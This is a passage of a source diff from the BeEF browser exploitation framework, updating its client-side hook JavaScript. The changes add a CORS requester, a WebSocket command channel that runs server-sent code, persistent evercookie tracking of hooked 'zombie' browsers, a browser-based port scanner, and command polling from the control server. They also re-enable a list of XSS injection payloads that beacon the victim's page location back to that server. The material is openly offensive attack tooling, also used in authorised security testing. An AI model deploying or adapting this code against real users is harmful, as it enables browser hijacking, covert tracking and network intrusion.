+						response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+					}
+
                 } else {
                     // same-domain request
                     response.status_code = xhr.status;
@@ -354,7 +434,7 @@ beef.net = {
 
     //this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
     //http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
-    clean: function(r) {
+    clean:function (r) {
         if (this.array_has_string_key(r)) {
             var obj = {};
             for (var key in r)
@@ -365,7 +445,7 @@ beef.net = {
     },
 
     //Detects if an array has a string key
-    array_has_string_key: function(arr) {
+    array_has_string_key:function (arr) {
         if ($j.isArray(arr)) {
             try {
                 for (var key in arr)
@@ -376,8 +456,10 @@ beef.net = {
         return false;
     },
 
-    //Sends back browser details to framework
-    browser_details: function() {
+    /**
+     * Sends back browser details to framework, calling beef.browser.getDetails()
+     */
+    browser_details:function () {
         var details = beef.browser.getDetails();
         details['HookSessionID'] = beef.session.get_hook_session_id();
         this.send('/init', 0, details);

core/main/client/net/cors.js

@@ -0,0 +1,77 @@
+beef.net.cors = {
+
+  handler: "cors",
+
+    /**
+     * Response Object - used in the beef.net.request callback
+     */
+    response:function () {
+        this.status  = null;      // 500, 404, 200, 302, etc
+        this.headers = null;      // full response headers
+        this.body    = null;      // full response body
+    },
+
+    /**
+     * Make a cross-domain request using CORS
+     *
+     * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
+     * @param url {String} url
+     * @param data {String} request body
+     * @param callback {Function} function to callback on completion
+     */
+    request: function(method, url, data, callback) {
+
+    var xhr;
+    var response = new this.response;
+
+    if (XMLHttpRequest) {
+        xhr = new XMLHttpRequest();
+
+        if ('withCredentials' in xhr) {
+            xhr.open(method, url, true);
+            xhr.onerror = function() {
+            };
+            xhr.onreadystatechange = function() {
+                if (xhr.readyState === 4) {
+                    response.headers = this.getAllResponseHeaders()
+                    response.body    = this.responseText;
+                    response.status  = this.status;
+                    if (!!callback) {
+                        if (!!response) {
+                            callback(response);
+                        } else { 
+                            callback('ERROR: No Response. CORS requests may be denied for this resource.')
+                        }
+                    }
+                }
+            };
+            xhr.send(data);
+        }
+    } else if (typeof XDomainRequest != "undefined") {
+        xhr = new XDomainRequest();
+        xhr.open(method, url);
+        xhr.onerror = function() {
+        };
+        xhr.onload = function() {
+            response.headers = this.getAllResponseHeaders()
+            response.body    = this.responseText;
+            response.status  = this.status;
+            if (!!callback) {
+                if (!!response) {
+                    callback(response);
+                } else {
+                    callback('ERROR: No Response. CORS requests may be denied for this resource.')
+                }
+            }
+        };
+        xhr.send(data);
+    } else {
+        if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
+    }
+
+    }
+
+};
+
+beef.regCmp('beef.net.cors');
+

core/main/client/net/dns.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net.dns
  * 
@@ -52,13 +43,13 @@ beef.net.dns = {
 
 		// sends a DNS request
 		sendQuery = function(query) {
-			//console.log("Requesting: "+query);
+			beef.debug("Requesting: "+query);
 			var img = new Image;
 			img.src = "http://"+query;
 			img.onload = function() { dom.removeChild(this); }
 			img.onerror = function() { dom.removeChild(this); }
 			dom.appendChild(img);
-		}
+		};
 
 		// encode message
 		var xor_key = Math.floor(Math.random()*99000+1000);

core/main/client/net/local.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net.local
  * 

core/main/client/net/portscanner.js

@@ -1,63 +1,54 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * @literal object: beef.net.portscanner
- * 
- * Provides port scanning functions for the zombie. A mod of pdp's scanner
- * 
- * Version: '0.1',
- * author: 'Petko Petkov',
- * homepage: 'http://www.gnucitizen.org'
- */
-
-beef.net.portscanner = {
-
-		scanPort: function(callback, target, port, timeout) 
-		{
-			var timeout = (timeout == null)?100:timeout;
-			var img = new Image();
-
-			img.onerror = function () {
-				if (!img) return;
-				img = undefined;
-				callback(target, port, 'open');
-			};
-
-			img.onload  = img.onerror;
-			
-			img.src = 'http://' + target + ':' + port;
-
-			setTimeout(function () {
-				if (!img) return;
-				img = undefined;
-				callback(target, port, 'closed');
-			}, timeout);
-
-		},
-
-		scanTarget: function(callback, target, ports_str, timeout)
-		{
-			var ports = ports_str.split(",");
-
-			for (index = 0; index < ports.length; index++) {
-				this.scanPort(callback, target, ports[index], timeout);
-			};
-
-		}
-};
-
-beef.regCmp('beef.net.portscanner');
-
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.net.portscanner
+ * 
+ * Provides port scanning functions for the zombie. A mod of pdp's scanner
+ * 
+ * Version: '0.1',
+ * author: 'Petko Petkov',
+ * homepage: 'http://www.gnucitizen.org'
+ */
+
+beef.net.portscanner = {
+
+		scanPort: function(callback, target, port, timeout) 
+		{
+			var timeout = (timeout == null)?100:timeout;
+			var img = new Image();
+
+			img.onerror = function () {
+				if (!img) return;
+				img = undefined;
+				callback(target, port, 'open');
+			};
+
+			img.onload  = img.onerror;
+			
+			img.src = 'http://' + target + ':' + port;
+
+			setTimeout(function () {
+				if (!img) return;
+				img = undefined;
+				callback(target, port, 'closed');
+			}, timeout);
+
+		},
+
+		scanTarget: function(callback, target, ports_str, timeout)
+		{
+			var ports = ports_str.split(",");
+
+			for (index = 0; index < ports.length; index++) {
+				this.scanPort(callback, target, ports[index], timeout);
+			};
+
+		}
+};
+
+beef.regCmp('beef.net.portscanner');
+

core/main/client/net/requester.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net.requester
  * 

core/main/client/net/xssrays.js

@@ -49,22 +49,20 @@ beef.net.xssrays = {
     //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
     vectors: [
 
-//				  {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
-//				  {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
-//				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
+				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
   				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
     // util function. Print string to the console only if the debug flag is on and the browser is not IE.
     printDebug:function(log) {
         if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
-            console.log("[XssRays] " + log);
+            beef.debug("[XssRays] " + log);
         }
     },
 
@@ -340,8 +338,8 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
-                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -368,7 +366,7 @@ beef.net.xssrays = {
                 beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                 beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                    + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                 exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -424,7 +422,7 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                         beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
                         form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

core/main/client/os.js

@@ -1,24 +1,15 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.os = {
 
 	ua: navigator.userAgent,
-	
+
 	isWin311: function() {
-		return (this.ua.indexOf("Win16") != -1) ? true : false;
+		return (this.ua.match('(Win16)')) ? true : false;
 	},
 	
 	isWinNT4: function() {
@@ -28,18 +19,25 @@ beef.os = {
 	isWin95: function() {
 		return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
 	},
+	isWinCE: function() {
+		return (this.ua.match('(Windows CE)')) ? true : false;
+	},
 	
 	isWin98: function() {
 		return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
 	},
 	
 	isWinME: function() {
-		return (this.ua.indexOf('Windows ME') != -1) ? true : false;
+		return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
 	},
 	
 	isWin2000: function() {
 		return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
 	},
+
+	isWin2000SP1: function() {
+		return (this.ua.match('Windows NT 5.01 ')) ? true : false;
+	},
 	
 	isWinXP: function() {
 		return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
@@ -56,6 +54,10 @@ beef.os = {
 	isWin7: function() {
 		return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
 	},
+
+	isWin8: function() {
+		return (this.ua.match('(Windows NT 6.2)')) ? true : false;
+	},
 	
 	isOpenBSD: function() {
 		return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
@@ -72,7 +74,11 @@ beef.os = {
 	isMacintosh: function() {
 		return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
 	},
-	
+
+	isWinPhone: function() {
+		return (this.ua.match('(Windows Phone)')) ? true : false;
+	},
+
 	isIphone: function() {
 		return (this.ua.indexOf('iPhone') != -1) ? true : false;
 	},
@@ -97,6 +103,10 @@ beef.os = {
 		return (this.ua.match('BlackBerry')) ? true : false;
 	},
 
+	isWebOS: function() {
+		return (this.ua.match('webOS')) ? true : false;
+	},
+
 	isQNX: function() {
 		return (this.ua.match('QNX')) ? true : false;
 	},
@@ -104,19 +114,26 @@ beef.os = {
 	isBeOS: function() {
 		return (this.ua.match('BeOS')) ? true : false;
 	},
+
+	isWindows: function() {
+		return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
+	},
 	
 	getName: function() {
-		//windows
-		if(this.isWin311()) return 'Windows 3.11';
-		if(this.isWinNT4()) return 'Windows NT 4';
-		if(this.isWin95()) return 'Windows 95';
-		if(this.isWin98()) return 'Windows 98';
-		if(this.isWinME()) return 'Windows Millenium';
-		if(this.isWin2000()) return 'Windows 2000';
-		if(this.isWinXP()) return 'Windows XP';
+		//Windows
+		if(this.isWin311())        return 'Windows 3.11';
+		if(this.isWinNT4())        return 'Windows NT 4';
+		if(this.isWinCE())         return 'Windows CE';
+		if(this.isWin95())         return 'Windows 95';
+		if(this.isWin98())         return 'Windows 98';
+		if(this.isWinME())         return 'Windows Millenium';
+		if(this.isWin2000())       return 'Windows 2000';
+		if(this.isWin2000SP1())    return 'Windows 2000 SP1';
+		if(this.isWinXP())         return 'Windows XP';
 		if(this.isWinServer2003()) return 'Windows Server 2003';
-		if(this.isWinVista()) return 'Windows Vista';
-		if(this.isWin7()) return 'Windows 7';
+		if(this.isWinVista())      return 'Windows Vista';
+		if(this.isWin7())          return 'Windows 7';
+		if(this.isWin8())          return 'Windows 8';
 
 		//Nokia
 		if(this.isNokia()) {
@@ -139,11 +156,14 @@ beef.os = {
 		if(this.isSunOS()) return 'Sun OS';
 
 		//iPhone
-		if (this.isIphone()) return 'iPhone';
+		if (this.isIphone()) return 'iOS';
 		//iPad
-		if (this.isIpad()) return 'iPad';
+		if (this.isIpad()) return 'iOS';
 		//iPod
-		if (this.isIpod()) return 'iPod';
+		if (this.isIpod()) return 'iOS';
+
+		// zune
+		//if (this.isZune()) return 'Zune';
 		
 		//macintosh
 		if(this.isMacintosh()) {
@@ -156,6 +176,7 @@ beef.os = {
 		//others
 		if(this.isQNX()) return 'QNX';
 		if(this.isBeOS()) return 'BeOS';
+		if(this.isWebOS()) return 'webOS';
 		
 		return 'unknown';
 	}

core/main/client/session.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.session
  *
@@ -22,7 +13,8 @@ beef.session = {
 	
 	hook_session_id_length: 80,
 	hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",	
-	ec: new evercookie(),	
+	ec: new evercookie(),
+    beefhook: "<%= @hook_session_name %>",
 	
 	/**
 	 * Gets a string which will be used to identify the hooked browser session
@@ -31,12 +23,12 @@ beef.session = {
 	 */
   	get_hook_session_id: function() {
 		// check if the browser is already known to the framework
-		var id = this.ec.evercookie_cookie("BEEFHOOK");
+		var id = this.ec.evercookie_cookie(beef.session.beefhook);
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_userdata("BEEFHOOK");
+			var id = this.ec.evercookie_userdata(beef.session.beefhook);
 		}
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_window("BEEFHOOK");
+			var id = this.ec.evercookie_window(beef.session.beefhook);
 		}
 		
 		// if the browser is not known create a hook session id and set it
@@ -56,9 +48,9 @@ beef.session = {
 	 */
   	set_hook_session_id: function(id) {
 		// persist the hook session id
-		this.ec.evercookie_cookie("BEEFHOOK", id);
-		this.ec.evercookie_userdata("BEEFHOOK", id);
-		this.ec.evercookie_window("BEEFHOOK", id);
+		this.ec.evercookie_cookie(beef.session.beefhook, id);
+		this.ec.evercookie_userdata(beef.session.beefhook, id);
+		this.ec.evercookie_window(beef.session.beefhook, id);
 	},
 	
 	/**
@@ -77,26 +69,7 @@ beef.session = {
 		}
 		
 		return hook_session_id;
-	},
-
-	/**
-	 * Overrides each link, and creates an iframe (loading the href) instead of following the link
-	 */
-	persistent: function() {
-		$j('a').click(function(e) {
-			if ($j(this).attr('href') != '')
-			{
-				e.preventDefault();
-				beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
-				$j(document).attr('title', $j(this).html());
-				document.body.scroll = "no";
-				document.documentElement.style.overflow = 'hidden';
-			}
-		});
 	}
-	
-
-				
 };
 
 beef.regCmp('beef.session');

core/main/client/timeout.js

@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*
+ Sometimes there are timing issues and looks like beef_init
+ is not called at all (always in cross-domain situations,
+ for example calling the hook with jquery getScript,
+ or sometimes with event handler injections).
+
+ To fix this, we call again beef_init after 1 second.
+ Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
+ antisnatchor
+ */
+setTimeout(beef_init, 1000);

core/main/client/updater.js

@@ -1,29 +1,21 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @Literal object: beef.updater
  *
  * Object in charge of getting new commands from the BeEF framework and execute them.
+ * The XHR-polling channel is managed here. If WebSockets are enabled,
+ * websocket.ls is used instead.
  */
 beef.updater = {
 	
-	// Low timeouts combined with the way the framework sends commamd modules result 
-	// in instructions being sent repeatedly or complex code. 
-	// If you suffer from ADHD, you can decrease this setting.
-	timeout: 1000,
+	// XHR-polling timeout.
+    xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
+    beefhook: "<%= @hook_session_name %>",
 	
 	// A lock.
 	lock: false,
@@ -51,18 +43,22 @@ beef.updater = {
 			beef.net.flush();
 			if(beef.commands.length > 0) {
 				this.execute_commands();
-			} else {
-				this.get_commands();
+			}else {
+				this.get_commands();    /*Polling*/
 			}
 		}
-		setTimeout("beef.updater.check();", beef.updater.timeout);
+
+      // ( typeof beef.websocket === "undefined")
+		setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
 	},
 	
-	// Gets new commands from the framework.
-	get_commands: function(http_response) {
+    /**
+     * Gets new commands from the framework.
+     */
+	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request('http', 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });
@@ -73,12 +69,12 @@ beef.updater = {
 		this.lock = false;
 	},
 	
-	// Executes the received commands if any.
+    /**
+     * Executes the received commands, if any.
+     */
 	execute_commands: function() {
 		if(beef.commands.length == 0) return;
-		
 		this.lock = true;
-		
 		while(beef.commands.length > 0) {
 			command = beef.commands.pop();
 			try {
@@ -87,9 +83,8 @@ beef.updater = {
 				console.error('execute_commands - command failed to execute: ' + e.message);
 			}
 		}
-		
 		this.lock = false;
 	}
-}
+};
 
 beef.regCmp('beef.updater');

core/main/client/websocket.js

@@ -0,0 +1,92 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+/**
+ * @Literal object: beef.websocket
+ *
+ * Manage the WebSocket communication channel.
+ * This channel is much faster and responsive, and it's used automatically
+ * if the browser supports WebSockets AND beef.http.websocket.enable = true.
+ */
+
+beef.websocket = {
+
+    socket:null,
+    ws_poll_timeout: "<%= @ws_poll_timeout %>",
+
+    /**
+     * Initialize the WebSocket client object.
+     * Note: use WebSocketSecure only if the hooked domain is under https.
+     * Mixed-content in WS is quite different from a non-WS context.
+     */
+    init:function () {
+        var webSocketServer = beef.net.host;
+        var webSocketPort = "<%= @websocket_port %>";
+        var webSocketSecure = "<%= @websocket_secure %>";
+        var protocol = "ws://";
+
+        if(webSocketSecure && window.location.protocol=="https:"){
+            protocol = "wss://";
+            webSocketPort= "<%= @websocket_sec_port %>";
+        }
+
+        if (beef.browser.isFF() && !!window.MozWebSocket) {
+            beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+        }else{
+            beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+        }
+
+    },
+
+    /**
+     * Send Helo message to the BeEF server and start async polling.
+     */
+    start:function () {
+        new beef.websocket.init();
+        this.socket.onopen = function () {
+            beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
+            beef.websocket.alive();
+        };
+
+        this.socket.onmessage = function (message) {
+            // Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
+            // That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
+            // It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
+            new Function(message.data)();
+        };
+
+        this.socket.onclose = function () {
+            setTimeout(function(){beef.websocket.start()}, 5000);
+        };
+    },
+
+    /**
+     * Send data back to BeEF. This is basically the same as beef.net.send,
+     * but doesn't queue commands.
+     * Example usage:
+     * beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
+     * '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
+     * '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
+     */
+    send:function (data) {
+        try {
+            this.socket.send(data);
+        }catch(err){}
+    },
+
+    /**
+     * Polling mechanism, to notify the BeEF server that the browser is still hooked,
+     * and the WebSocket channel still alive.
+     * todo: there is probably a more efficient way to do this. Double-check WebSocket API.
+     */
+    alive: function (){
+        beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
+        setTimeout("beef.websocket.alive()", beef.websocket.ws_poll_timeout);
+    }
+};
+
+beef.regCmp('beef.websocket');

core/main/command.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
